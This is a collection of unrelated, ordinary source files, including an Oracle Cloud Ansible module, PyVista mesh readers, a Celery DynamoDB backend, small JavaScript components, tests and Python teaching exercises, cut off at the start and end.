"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_service_catalog_private_application_logo_facts
short_description: Fetches details about a PrivateApplicationLogo resource in Oracle Cloud Infrastructure
description:
- Fetches details about a PrivateApplicationLogo resource in Oracle Cloud Infrastructure
- Downloads the binary payload of the logo image of the private application.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
dest:
description:
- The destination file path to write the output. The file will be created if it does not exist. If the file already exists, the content will be
overwritten.
type: str
required: true
private_application_id:
description:
- The unique identifier for the private application.
type: str
aliases: ["id"]
required: true
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Get a specific private_application_logo
oci_service_catalog_private_application_logo_facts:
# required
dest: /tmp/myfile
private_application_id: "ocid1.privateapplication.oc1..xxxxxxEXAMPLExxxxxx"
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.service_catalog import ServiceCatalogClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class PrivateApplicationLogoFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get"""
def get_required_params_for_get(self):
return [
"private_application_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_private_application_action_download_logo,
private_application_id=self.module.params.get("private_application_id"),
)
def get(self):
response = self.get_resource().data
dest = self.module.params.get("dest")
chunk_size = oci_common_utils.MEBIBYTE
with open(to_bytes(dest), "wb") as dest_file:
for chunk in response.raw.stream(chunk_size, decode_content=True):
dest_file.write(chunk)
return None
PrivateApplicationLogoFactsHelperCustom = get_custom_class(
"PrivateApplicationLogoFactsHelperCustom"
)
class ResourceFactsHelper(
PrivateApplicationLogoFactsHelperCustom, PrivateApplicationLogoFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
dest=dict(type="str", required=True),
private_application_id=dict(aliases=["id"], type="str", required=True),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="private_application_logo",
service_client_class=ServiceCatalogClient,
namespace="service_catalog",
)
result = []
if resource_facts_helper.is_get():
result = resource_facts_helper.get()
else:
resource_facts_helper.fail()
module.exit_json(private_application_logo=result)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""Convert ICD-10 to OBO.
Run with python -m pyobo.sources.icd10 -v
"""
import logging
from typing import Any, Iterable, Mapping
import click
from more_click import verbose_option
from tqdm import tqdm
from ..sources.icd_utils import (
ICD10_TOP_LEVEL_URL,
get_child_identifiers,
get_icd,
visiter,
)
from ..struct import Obo, Reference, Synonym, Term
from ..utils.path import prefix_directory_join
logger = logging.getLogger(__name__)
PREFIX = "icd10"
VERSION = "2016"
def get_obo() -> Obo:
"""Get ICD-10 as OBO."""
return Obo(
ontology=PREFIX,
name="International Statistical Classification of Diseases and Related Health Problems 10th Revision",
auto_generated_by=f"bio2obo:{PREFIX}",
iter_terms=iter_terms,
)
def iter_terms() -> Iterable[Term]:
"""Iterate over ICD-10 terms."""
r = get_icd(ICD10_TOP_LEVEL_URL)
res_json = r.json()
directory = prefix_directory_join(PREFIX, version=VERSION)
chapter_urls = res_json["child"]
tqdm.write(f"there are {len(chapter_urls)} chapters")
visited_identifiers = set()
for identifier in get_child_identifiers(ICD10_TOP_LEVEL_URL, res_json):
yield from visiter(
identifier,
visited_identifiers,
directory,
endpoint=ICD10_TOP_LEVEL_URL,
converter=_extract_icd10,
)
def _extract_icd10(res_json: Mapping[str, Any]) -> Term:
identifier = res_json["code"]
name = res_json["title"]["@value"]
synonyms = [Synonym(synonym["label"]["@value"]) for synonym in res_json.get("synonym", [])]
parents = [
Reference(prefix=PREFIX, identifier=url[len(ICD10_TOP_LEVEL_URL) :])
for url in res_json["parent"]
if url[len(ICD10_TOP_LEVEL_URL) :]
]
rv = Term(
reference=Reference(prefix=PREFIX, identifier=identifier, name=name),
synonyms=synonyms,
parents=parents,
)
rv.append_property("class_kind", res_json["classKind"])
return rv
@click.command()
@verbose_option
def _main():
get_obo().write_default(use_tqdm=True)
if __name__ == "__main__":
_main()
|
"""Contains a dictionary that maps file extensions to VTK readers."""
import pathlib
import os
import numpy as np
import vtk
import pyvista
VTK9 = vtk.vtkVersion().GetVTKMajorVersion() >= 9
READERS = {
# Standard dataset readers:
'.vtk': vtk.vtkDataSetReader,
'.pvtk': vtk.vtkPDataSetReader,
'.vti': vtk.vtkXMLImageDataReader,
'.pvti': vtk.vtkXMLPImageDataReader,
'.vtr': vtk.vtkXMLRectilinearGridReader,
'.pvtr': vtk.vtkXMLPRectilinearGridReader,
'.vtu': vtk.vtkXMLUnstructuredGridReader,
'.pvtu': vtk.vtkXMLPUnstructuredGridReader,
'.ply': vtk.vtkPLYReader,
'.obj': vtk.vtkOBJReader,
'.stl': vtk.vtkSTLReader,
'.vtp': vtk.vtkXMLPolyDataReader,
'.vts': vtk.vtkXMLStructuredGridReader,
'.vtm': vtk.vtkXMLMultiBlockDataReader,
'.vtmb': vtk.vtkXMLMultiBlockDataReader,
'.case': vtk.vtkGenericEnSightReader,
# Image formats:
'.bmp': vtk.vtkBMPReader,
'.dem': vtk.vtkDEMReader,
'.dcm': vtk.vtkDICOMImageReader,
'.img': vtk.vtkDICOMImageReader,
'.jpeg': vtk.vtkJPEGReader,
'.jpg': vtk.vtkJPEGReader,
'.mhd': vtk.vtkMetaImageReader,
'.nrrd': vtk.vtkNrrdReader,
'.nhdr': vtk.vtkNrrdReader,
'.png': vtk.vtkPNGReader,
'.pnm': vtk.vtkPNMReader, # TODO: not tested
'.slc': vtk.vtkSLCReader,
'.tiff': vtk.vtkTIFFReader,
'.tif': vtk.vtkTIFFReader,
# Other formats:
'.byu': vtk.vtkBYUReader, # TODO: not tested with this extension
'.g': vtk.vtkBYUReader,
# '.chemml': vtk.vtkCMLMoleculeReader, # TODO: not tested
# '.cml': vtk.vtkCMLMoleculeReader, # vtkMolecule is not supported by pyvista
# TODO: '.csv': vtk.vtkCSVReader, # vtkTables are currently not supported
'.facet': vtk.vtkFacetReader,
'.cas': vtk.vtkFLUENTReader, # TODO: not tested
# '.dat': vtk.vtkFLUENTReader, # TODO: not working
# '.cube': vtk.vtkGaussianCubeReader, # Contains `atom_types` which are not supported?
'.res': vtk.vtkMFIXReader, # TODO: not tested
'.foam': vtk.vtkOpenFOAMReader,
# '.pdb': vtk.vtkPDBReader, # Contains `atom_types` which are not supported?
'.p3d': vtk.vtkPlot3DMetaReader,
'.pts': vtk.vtkPTSReader,
# '.particles': vtk.vtkParticleReader, # TODO: not tested
#TODO: '.pht': vtk.vtkPhasta??????,
#TODO: '.vpc': vtk.vtkVPIC?????,
# '.bin': vtk.vtkMultiBlockPLOT3DReader,# TODO: non-default routine
'.tri': vtk.vtkMCubesReader,
'.inp': vtk.vtkAVSucdReader,
}
VTK_MAJOR = vtk.vtkVersion().GetVTKMajorVersion()
VTK_MINOR = vtk.vtkVersion().GetVTKMinorVersion()
if (VTK_MAJOR >= 8 and VTK_MINOR >= 2):
try:
READERS['.sgy'] = vtk.vtkSegYReader
READERS['.segy'] = vtk.vtkSegYReader
except AttributeError:
pass
def get_ext(filename):
"""Extract the extension of the filename."""
ext = os.path.splitext(filename)[1].lower()
return ext
def get_reader(filename):
"""Get the corresponding reader based on file extension and instantiates it."""
ext = get_ext(filename)
return READERS[ext]() # Get and instantiate the reader
def set_vtkwriter_mode(vtk_writer, use_binary=True):
"""Set any vtk writer to write as binary or ascii."""
if isinstance(vtk_writer, (vtk.vtkDataWriter, vtk.vtkPLYWriter, vtk.vtkSTLWriter)):
if use_binary:
vtk_writer.SetFileTypeToBinary()
else:
vtk_writer.SetFileTypeToASCII()
elif isinstance(vtk_writer, vtk.vtkXMLWriter):
if use_binary:
vtk_writer.SetDataModeToBinary()
else:
vtk_writer.SetDataModeToAscii()
return vtk_writer
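# Illustrative call sketch (an assumption, not part of the original module):
# force a legacy/PLY/STL writer to write ASCII instead of binary output.
#
#   writer = set_vtkwriter_mode(vtk.vtkSTLWriter(), use_binary=False)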
def standard_reader_routine(reader, filename, attrs=None):
"""Use a given reader in the common VTK reading pipeline routine.
The reader must come from the ``READERS`` mapping.
Parameters
----------
reader : vtkReader
Any instantiated VTK reader class
filename : str
The string filename to the data file to read.
attrs : dict, optional
A dictionary of attributes to call on the reader. Keys of dictionary are
the attribute/method names and values are the arguments passed to those
calls. If you do not have any attributes to call, pass ``None`` as the
value.
"""
if attrs is None:
attrs = {}
if not isinstance(attrs, dict):
raise TypeError('Attributes must be a dictionary of name and arguments.')
if filename is not None:
reader.SetFileName(filename)
# Apply any attributes listed
for name, args in attrs.items():
attr = getattr(reader, name)
if args is not None:
if not isinstance(args, (list, tuple)):
args = [args]
attr(*args)
else:
attr()
# Perform the read
reader.Update()
return pyvista.wrap(reader.GetOutputDataObject(0))
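# Illustrative use of the ``attrs`` mapping (an assumption, not part of the
# original module): each key is a reader method name and the value holds its
# arguments; ``None`` means the method is called with no arguments. The
# filename below is made up for the example.
#
#   reader = vtk.vtkSTLReader()
#   mesh = standard_reader_routine(reader, 'surface.stl', attrs={'MergingOn': None})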
def read_legacy(filename):
"""Use VTK's legacy reader to read a file."""
reader = vtk.vtkDataSetReader()
reader.SetFileName(filename)
# Ensure all data is fetched with poorly formatted legacy files
reader.ReadAllScalarsOn()
reader.ReadAllColorScalarsOn()
reader.ReadAllNormalsOn()
reader.ReadAllTCoordsOn()
reader.ReadAllVectorsOn()
# Perform the read
output = standard_reader_routine(reader, None)
if output is None:
raise RuntimeError("No output when using VTK's legacy reader")
return output
def read(filename, attrs=None, file_format=None):
"""Read any VTK file.
It will figure out what reader to use, then wrap the VTK object for
use in PyVista.
Parameters
----------
filename : str
The string path to the file to read. If a list of files is
given, a :class:`pyvista.MultiBlock` dataset is returned with
each file being a separate block in the dataset.
attrs : dict, optional
A dictionary of attributes to call on the reader. Keys of
dictionary are the attribute/method names and values are the
arguments passed to those calls. If you do not have any
attributes to call, pass ``None`` as the value.
file_format : str, optional
Format of file to read with meshio.
Examples
--------
Load an example mesh
>>> import pyvista
>>> from pyvista import examples
>>> mesh = pyvista.read(examples.antfile)
Load a vtk file
>>> mesh = pyvista.read('my_mesh.vtk') # doctest:+SKIP
Load a meshio file
>>> mesh = pyvista.read("mesh.obj") # doctest:+SKIP
"""
if isinstance(filename, (list, tuple)):
multi = pyvista.MultiBlock()
for each in filename:
if isinstance(each, (str, pathlib.Path)):
name = os.path.basename(str(each))
else:
name = None
multi[-1, name] = read(each, attrs=attrs,
file_format=file_format)
return multi
filename = os.path.abspath(os.path.expanduser(str(filename)))
if not os.path.isfile(filename):
raise FileNotFoundError(f'File ({filename}) not found')
ext = get_ext(filename)
# Read file using meshio.read if file_format is present
if file_format:
return read_meshio(filename, file_format)
# From the extension, decide which reader to use
if attrs is not None:
reader = get_reader(filename)
return standard_reader_routine(reader, filename, attrs=attrs)
elif ext in '.vti': # ImageData
return pyvista.UniformGrid(filename)
elif ext in '.vtr': # RectilinearGrid
return pyvista.RectilinearGrid(filename)
elif ext in '.vtu': # UnstructuredGrid
return pyvista.UnstructuredGrid(filename)
elif ext in ['.ply', '.obj', '.stl']: # PolyData
return pyvista.PolyData(filename)
elif ext in '.vts': # StructuredGrid
return pyvista.StructuredGrid(filename)
elif ext in ['.vtm', '.vtmb', '.case']:
return pyvista.MultiBlock(filename)
elif ext in ['.e', '.exo']:
return read_exodus(filename)
elif ext in ['.vtk']:
# Attempt to use the legacy reader...
return read_legacy(filename)
elif ext in ['.jpeg', '.jpg']:
return pyvista.Texture(filename).to_image()
else:
# Attempt to find a reader in the readers mapping
try:
reader = get_reader(filename)
return standard_reader_routine(reader, filename)
except KeyError:
# Attempt read with meshio
try:
from meshio._exceptions import ReadError
try:
return read_meshio(filename)
except ReadError:
pass
except SyntaxError:
# https://github.com/pyvista/pyvista/pull/495
pass
raise IOError("This file was not able to be automatically read by pyvista.")
def read_texture(filename, attrs=None):
"""Load a ``vtkTexture`` from an image file."""
filename = os.path.abspath(os.path.expanduser(filename))
try:
# initialize the reader using the extension to find it
reader = get_reader(filename)
image = standard_reader_routine(reader, filename, attrs=attrs)
if image.n_points < 2:
raise ValueError("Problem reading the image with VTK.")
return pyvista.Texture(image)
except (KeyError, ValueError):
# Otherwise, use the imageio reader
pass
import imageio
return pyvista.Texture(imageio.imread(filename))
def read_exodus(filename,
animate_mode_shapes=True,
apply_displacements=True,
displacement_magnitude=1.0,
enabled_sidesets=None):
"""Read an ExodusII file (``'.e'`` or ``'.exo'``)."""
reader = vtk.vtkExodusIIReader()
reader.SetFileName(filename)
reader.UpdateInformation()
reader.SetAnimateModeShapes(animate_mode_shapes)
reader.SetApplyDisplacements(apply_displacements)
reader.SetDisplacementMagnitude(displacement_magnitude)
if enabled_sidesets is None:
enabled_sidesets = list(range(reader.GetNumberOfSideSetArrays()))
for sideset in enabled_sidesets:
if isinstance(sideset, int):
name = reader.GetSideSetArrayName(sideset)
elif isinstance(sideset, str):
name = sideset
else:
raise ValueError(f'Could not parse sideset ID/name: {sideset}')
reader.SetSideSetArrayStatus(name, 1)
reader.Update()
return pyvista.wrap(reader.GetOutput())
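# Illustrative call sketch (the filename and sideset name are assumptions):
#   mesh = read_exodus('results.e', enabled_sidesets=['wall'])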
def read_plot3d(filename, q_filenames=(), auto_detect=True, attrs=None):
"""Read a Plot3D grid file (e.g., grid.in) and optional q file(s).
Parameters
----------
filename : str
The string filename to the data file to read.
q_filenames : str or tuple(str), optional
The string filename of the q-file, or iterable of such filenames.
auto_detect : bool, optional
When this option is turned on, the reader will try to figure out the
values of various options such as byte order, byte count etc. Default is
True.
attrs : dict, optional
A dictionary of attributes to call on the reader. Keys of dictionary are
the attribute/method names and values are the arguments passed to those
calls. If you do not have any attributes to call, pass ``None`` as the
value.
Returns
-------
mesh : pyvista.MultiBlock
Data read from the file.
"""
filename = _process_filename(filename)
reader = vtk.vtkMultiBlockPLOT3DReader()
reader.SetFileName(filename)
# q_filenames may be a list or a single filename
if q_filenames:
if isinstance(q_filenames, (str, pathlib.Path)):
q_filenames = [q_filenames]
q_filenames = [_process_filename(f) for f in q_filenames]
if hasattr(reader, 'AddFileName'):
# AddFileName was added to vtkMultiBlockPLOT3DReader sometime around
# VTK 8.2. This method supports reading multiple q files.
for q_filename in q_filenames:
reader.AddFileName(q_filename)
else:
# SetQFileName is used to add a single q file to be read, and is still
# supported in VTK9.
if len(q_filenames) > 0:
if len(q_filenames) > 1:
raise RuntimeError('Reading of multiple q files is not supported '
'with this version of VTK.')
reader.SetQFileName(q_filenames[0])
attrs = {} if not attrs else attrs
attrs['SetAutoDetectFormat'] = auto_detect
return standard_reader_routine(reader, filename=None, attrs=attrs)
def from_meshio(mesh):
"""Convert a ``meshio`` mesh instance to a PyVista mesh."""
from meshio.vtk._vtk import (
meshio_to_vtk_type,
vtk_type_to_numnodes,
)
# Extract cells from meshio.Mesh object
offset = []
cells = []
cell_type = []
next_offset = 0
for c in mesh.cells:
vtk_type = meshio_to_vtk_type[c.type]
numnodes = vtk_type_to_numnodes[vtk_type]
cells.append(
np.hstack((np.full((len(c.data), 1), numnodes), c.data)).ravel()
)
cell_type += [vtk_type] * len(c.data)
if not VTK9:
offset += [next_offset + i * (numnodes + 1) for i in range(len(c.data))]
next_offset = offset[-1] + numnodes + 1
# Extract cell data from meshio.Mesh object
cell_data = {k: np.concatenate(v) for k, v in mesh.cell_data.items()}
# Create pyvista.UnstructuredGrid object
points = mesh.points
if points.shape[1] == 2:
points = np.hstack((points, np.zeros((len(points), 1))))
if VTK9:
grid = pyvista.UnstructuredGrid(
np.concatenate(cells),
np.array(cell_type),
np.array(points, np.float64),
)
else:
grid = pyvista.UnstructuredGrid(
np.array(offset),
np.concatenate(cells),
np.array(cell_type),
np.array(points, np.float64),
)
# Set point data
grid.point_arrays.update({k: np.array(v, np.float64) for k, v in mesh.point_data.items()})
# Set cell data
grid.cell_arrays.update(cell_data)
return grid
def read_meshio(filename, file_format=None):
"""Read any mesh file using meshio."""
import meshio
# Make sure relative paths will work
filename = os.path.abspath(os.path.expanduser(str(filename)))
# Read mesh file
mesh = meshio.read(filename, file_format)
return from_meshio(mesh)
def save_meshio(filename, mesh, file_format=None, **kwargs):
    """Save mesh to file using meshio.
    Parameters
    ----------
    filename : str
        Filename to save the mesh to.  The file format is inferred from the
        extension unless ``file_format`` is given.
    mesh : pyvista.Common
        Any PyVista mesh/spatial data type.
    file_format : str
        File type for meshio to save.
    """
import meshio
from meshio.vtk._vtk import vtk_to_meshio_type
# Make sure relative paths will work
filename = os.path.abspath(os.path.expanduser(str(filename)))
# Cast to pyvista.UnstructuredGrid
if not isinstance(mesh, pyvista.UnstructuredGrid):
mesh = mesh.cast_to_unstructured_grid()
# Copy useful arrays to avoid repeated calls to properties
vtk_offset = mesh.offset
vtk_cells = mesh.cells
vtk_cell_type = mesh.celltypes
# Check that meshio supports all cell types in input mesh
pixel_voxel = {8, 11} # Handle pixels and voxels
for cell_type in np.unique(vtk_cell_type):
if cell_type not in vtk_to_meshio_type.keys() and cell_type not in pixel_voxel:
raise TypeError(f"meshio does not support VTK type {cell_type}.")
# Get cells
cells = []
c = 0
for offset, cell_type in zip(vtk_offset, vtk_cell_type):
numnodes = vtk_cells[offset+c]
if VTK9: # must offset by cell count
cell = vtk_cells[offset+1+c:offset+1+c+numnodes]
c += 1
else:
cell = vtk_cells[offset+1:offset+1+numnodes]
cell = (
cell if cell_type not in pixel_voxel
else cell[[0, 1, 3, 2]] if cell_type == 8
else cell[[0, 1, 3, 2, 4, 5, 7, 6]]
)
cell_type = cell_type if cell_type not in pixel_voxel else cell_type+1
cell_type = (
vtk_to_meshio_type[cell_type] if cell_type != 7
else f"polygon{numnodes}"
)
if len(cells) > 0 and cells[-1][0] == cell_type:
cells[-1][1].append(cell)
else:
cells.append((cell_type, [cell]))
for k, c in enumerate(cells):
cells[k] = (c[0], np.array(c[1]))
# Get point data
point_data = {k.replace(" ", "_"): v for k, v in mesh.point_arrays.items()}
# Get cell data
vtk_cell_data = mesh.cell_arrays
n_cells = np.cumsum([len(c[1]) for c in cells[:-1]])
cell_data = (
{k.replace(" ", "_"): np.split(v, n_cells) for k, v in vtk_cell_data.items()}
if vtk_cell_data
else {}
)
# Save using meshio
meshio.write_points_cells(
filename=filename,
points=np.array(mesh.points),
cells=cells,
point_data=point_data,
cell_data=cell_data,
file_format=file_format,
**kwargs
)
def _process_filename(filename):
return os.path.abspath(os.path.expanduser(str(filename)))
|
'''
[Hard]This problem was asked by Amazon.
There exists a staircase with N steps, and you can climb up either
1 or 2 steps at a time. Given N, write a function that returns the
number of unique ways you can climb the staircase. The order of the
steps matters.
For example, if N is 4, then there are 5 unique ways:
1, 1, 1, 1
2, 1, 1
1, 2, 1
1, 1, 2
2, 2
What if, instead of being able to climb 1 or 2 steps at a time, you
could climb any number from a set of positive integers X?
For example, if X = {1, 3, 5}, you could climb 1, 3, or 5 steps at
a time.
'''
# This problem is similar to Daily Coding Problem #7, so the code from that
# problem is adapted and reused here.
steps=[]
def function1(n,s):
if n==1:
steps.append(s+"1")
return
else:
function1(n-1,s+"1")
if n==2:
steps.append(s+"2")
else:
function1(n-2,s+"2")
function1(7,"")
print("Steps:",len(steps))
print(steps)
# The second requirement generalizes function1 to an arbitrary set of allowed step sizes.
steps=[]
arr=[1,3,5]
def function2(n,s):
for i in arr:
if n==i:
steps.append(s+str(i))
elif i<n:
function2(n-i,s+str(i))
function2(7,"")
print("Steps:",len(steps))
print(steps)
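# A hedged alternative sketch: when only the number of ways is needed (not the
# step sequences themselves), a dynamic-programming count avoids enumerating
# every path. `allowed` is the set X of step sizes from the problem statement.
def count_ways(n, allowed=(1, 2)):
    # ways[i] = number of distinct ordered ways to reach step i
    ways = [0] * (n + 1)
    ways[0] = 1
    for i in range(1, n + 1):
        ways[i] = sum(ways[i - s] for s in allowed if s <= i)
    return ways[n]
print("Ways (1 or 2 steps, N=4):", count_ways(4))        # 5, matches the example above
print("Ways (X={1,3,5}, N=7):", count_ways(7, (1, 3, 5)))  # same count as function2(7, "")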
|
describe('[Regression](GH-423)', function () {
it('Should raise click event except in Firefox if target element appends child after mousedown', function () {
return runTests('testcafe-fixtures/index.test.js', 'Raise click if target appends child', { skip: ['firefox', 'firefox-osx'] });
});
it("Shouldn't raise click event in Firefox if target element appends child after mousedown", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click if target element appends child", { only: ['firefox', 'firefox-osx'] });
});
it("Shouldn't not raise click if target is overlapped", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click if target is overlapped");
});
it("Should raise click event in Firefox if target's parent has been changed after mousedown", function () {
return runTests('testcafe-fixtures/index.test.js', 'Raise click if target parent changed', { only: ['firefox', 'firefox-osx'] });
});
it("Shouldn't raise click event except in Firefox if target's parent has been changed after mousedown", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click if target parent changed", { skip: ['firefox', 'firefox-osx'] });
});
it("Shouldn't raise click if target appends editable form element", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click event if target appends input element");
});
});
|
import React, {useContext} from 'react';
import {Context} from '../context';
import "./sidePanel.css";
export default function ListContainer(){
const {setList, filterResults, fetchListUsers} = useContext(Context);
const handleClick = (list) => {
setList(list);
fetchListUsers(list);
}
if (filterResults.length > 0) {
return(
<div className="list_container" id='scrollbar' >
{filterResults.map((list) => {
return(
<div className="list_name" key={list.id} onClick={() => handleClick(list)}>
<h3 key={list.id} id={list.id}>{list.list_name}</h3>
</div>
)
})}
</div>
)
} else {
return(
<div className="list_container">
<span>¯\_(ツ)_/¯</span>
<p>No lists could be found</p>
</div>
);
}
}
|
"非同期でやらせたいタスク"
import time
def handle(event, context):
print("name = %s" % event['name'])
time.sleep(5)
return "Success"
|
angular.module('angularResizable', [])
.directive('resizable', function ($document, $timeout, $window) {
var toCall;
function throttle(fun) {
if (!toCall) {
toCall = fun;
$timeout(function () {
toCall();
toCall = null;
}, 100);
} else {
toCall = fun;
}
}
return {
restrict: 'A',
scope: {
rDirections: '=',
rGrabber : '@'
},
link: function ($scope, $element) {
$element.addClass('resizable');
var style = $window.getComputedStyle($element[0], null);
var size;
var axis;
var start;
var dir;
var info = {};
var updateInfo = function () {
var parameter = axis === 'x' ? 'width' : 'height';
info.width = false;
info.height = false;
info.id = $element[0].id;
info[parameter] = parseInt($element[0].style[parameter], 10);
};
var createGrabbers = function () {
var inner = $scope.rGrabber || '<span></span>';
$scope.rDirections.forEach(function (direction) {
var grabber = $document[0].createElement('div');
// add class for styling purposes
grabber.setAttribute('class', 'rg-' + direction);
grabber.innerHTML = inner;
$element[0].appendChild(grabber);
grabber.ondragstart = function () { return false; };
grabber.addEventListener('mousedown', dragStart.bind(null, direction), false);
});
};
var dragging = function (event) {
var offset = start - (axis === 'x' ? event.clientX : event.clientY);
$element[0].style[axis === 'x' ? 'width' : 'height'] = size + offset * dir + 'px';
updateInfo();
throttle(function () {
$scope.$emit('angular-resizable.resizing', info);
});
};
var dragEnd = function () {
updateInfo();
$scope.$emit('angular-resizable.resizeEnd', info);
$scope.$apply();
$document[0].removeEventListener('mouseup', dragEnd, false);
$document[0].removeEventListener('mousemove', dragging, false);
$element.removeClass('no-transition');
};
var dragStart = function (direction, event) {
axis = direction === 'left' || direction === 'right' ? 'x' : 'y';
dir = direction === 'bottom' || direction === 'right' ? -1 : 1;
start = axis === 'x' ? event.clientX : event.clientY;
size = parseInt(style.getPropertyValue(axis === 'x' ? 'width' : 'height'), 10);
//prevent transition while dragging
$element.addClass('no-transition');
$document[0].addEventListener('mouseup', dragEnd, false);
$document[0].addEventListener('mousemove', dragging, false);
// Disable highlighting while dragging
if (event.stopPropagation) { event.stopPropagation(); }
if (event.preventDefault) { event.preventDefault(); }
event.cancelBubble = true;
event.returnValue = false;
updateInfo();
$scope.$emit('angular-resizable.resizeStart', info);
$scope.$apply();
};
createGrabbers();
}
};
});
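// Usage sketch (assumed markup, not taken from this file): the directive is an
// attribute; `r-directions` lists the resizable edges and `r-grabber` optionally
// overrides the grabber's inner HTML.
//   <div resizable r-directions="['right', 'bottom']" r-grabber="'<span></span>'"></div>
// Resize progress can be observed via the 'angular-resizable.resizing' and
// 'angular-resizable.resizeEnd' events emitted on the scope.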
|
#!/usr/bin/env python
def print_banner(s):
print('##------------------------------------------------------------------------------')
print(f'## {s}')
print('##------------------------------------------------------------------------------')
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
print_banner('User class without __str__ or __repr__')
my_car = Car('red', 37281)
print(my_car)
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
def __str__(self):
return f'a {self.color} car'
print_banner('User class with __str__')
my_car = Car('red', 37281)
print(my_car)
print_banner('Converting to string with str() method')
print(str(my_car))
print_banner('Converting to string with \'{}\'.format method')
print('{}'.format(my_car))
print_banner('Compare between __str__ and __repr__')
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
def __str__(self):
return f'__str__ for Car'
def __repr__(self):
return f'__repr__ for Car'
my_car = Car('red', 37281)
print(my_car)
print('{}'.format(my_car))
print('__repr__ is used when inspecting objects in an interactive session and for elements inside containers')
print(str([my_car]))
print(str(my_car))
print(repr(my_car))
import datetime
today = datetime.date.today()
print(str(today))
print(repr(today))
print(type(today))
print_banner('Redefine __repr__ with don\'t repeat yourself approach')
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
def __repr__(self):
return (f'{self.__class__.__name__}('
f'{self.color!r}, {self.mileage!r})')
my_car = Car('red', 37281)
print(my_car)
|
load("bf4b12814bc95f34eeb130127d8438ab.js");
load("93fae755edd261212639eed30afa2ca4.js");
load("9943750f07ea537be5f5aa14a5f7b1b7.js");
// Copyright (C) 2015 the V8 project authors. All rights reserved.
// This code is governed by the BSD license found in the LICENSE file.
/*---
es6id: 21.2.5.8
description: RegExp.prototype[Symbol.replace] `length` property
info: >
ES6 Section 17:
Every built-in Function object, including constructors, has a length
property whose value is an integer. Unless otherwise specified, this value
is equal to the largest number of named arguments shown in the subclause
headings for the function description, including optional parameters.
[...]
Unless otherwise specified, the length property of a built-in Function
object has the attributes { [[Writable]]: false, [[Enumerable]]: false,
[[Configurable]]: true }.
includes: [propertyHelper.js]
---*/
assert.sameValue(RegExp.prototype[Symbol.replace].length, 2);
verifyNotEnumerable(RegExp.prototype[Symbol.replace], 'length');
verifyNotWritable(RegExp.prototype[Symbol.replace], 'length');
verifyConfigurable(RegExp.prototype[Symbol.replace], 'length');
|
# -*- coding: utf-8 -*-
"""AWS DynamoDB result store backend."""
from __future__ import absolute_import, unicode_literals
from collections import namedtuple
from time import sleep, time
from kombu.utils.url import _parse_url as parse_url
from celery.exceptions import ImproperlyConfigured
from celery.five import string
from celery.utils.log import get_logger
from .base import KeyValueStoreBackend
try:
import boto3
from botocore.exceptions import ClientError
except ImportError: # pragma: no cover
boto3 = ClientError = None # noqa
__all__ = ('DynamoDBBackend',)
# Helper class that describes a DynamoDB attribute
DynamoDBAttribute = namedtuple('DynamoDBAttribute', ('name', 'data_type'))
logger = get_logger(__name__)
class DynamoDBBackend(KeyValueStoreBackend):
"""AWS DynamoDB result backend.
Raises:
celery.exceptions.ImproperlyConfigured:
if module :pypi:`boto3` is not available.
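    Example:
        A hedged configuration sketch; the credentials, region and table name
        below are placeholders, and the ``read``/``write`` query options map to
        the read/write provisioned throughput settings of this backend::
            app.conf.result_backend = (
                'dynamodb://aws_access_key_id:aws_secret_access_key@'
                'us-east-1/celery_results?read=5&write=5'
            )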
"""
#: default DynamoDB table name (`default`)
table_name = 'celery'
#: Read Provisioned Throughput (`default`)
read_capacity_units = 1
#: Write Provisioned Throughput (`default`)
write_capacity_units = 1
#: AWS region (`default`)
aws_region = None
#: The endpoint URL that is passed to boto3 (local DynamoDB) (`default`)
endpoint_url = None
_key_field = DynamoDBAttribute(name='id', data_type='S')
_value_field = DynamoDBAttribute(name='result', data_type='B')
_timestamp_field = DynamoDBAttribute(name='timestamp', data_type='N')
_available_fields = None
def __init__(self, url=None, table_name=None, *args, **kwargs):
super(DynamoDBBackend, self).__init__(*args, **kwargs)
self.url = url
self.table_name = table_name or self.table_name
if not boto3:
raise ImproperlyConfigured(
'You need to install the boto3 library to use the '
'DynamoDB backend.')
aws_credentials_given = False
aws_access_key_id = None
aws_secret_access_key = None
if url is not None:
scheme, region, port, username, password, table, query = \
parse_url(url)
aws_access_key_id = username
aws_secret_access_key = password
access_key_given = aws_access_key_id is not None
secret_key_given = aws_secret_access_key is not None
if access_key_given != secret_key_given:
raise ImproperlyConfigured(
'You need to specify both the Access Key ID '
'and Secret.')
aws_credentials_given = access_key_given
if region == 'localhost':
# We are using the downloadable, local version of DynamoDB
self.endpoint_url = 'http://localhost:{}'.format(port)
self.aws_region = 'us-east-1'
logger.warning(
'Using local-only DynamoDB endpoint URL: {}'.format(
self.endpoint_url
)
)
else:
self.aws_region = region
# If endpoint_url is explicitly set use it instead
_get = self.app.conf.get
config_endpoint_url = _get('dynamodb_endpoint_url')
if config_endpoint_url:
self.endpoint_url = config_endpoint_url
self.read_capacity_units = int(
query.get(
'read',
self.read_capacity_units
)
)
self.write_capacity_units = int(
query.get(
'write',
self.write_capacity_units
)
)
self.table_name = table or self.table_name
self._available_fields = (
self._key_field,
self._value_field,
self._timestamp_field
)
self._client = None
if aws_credentials_given:
self._get_client(
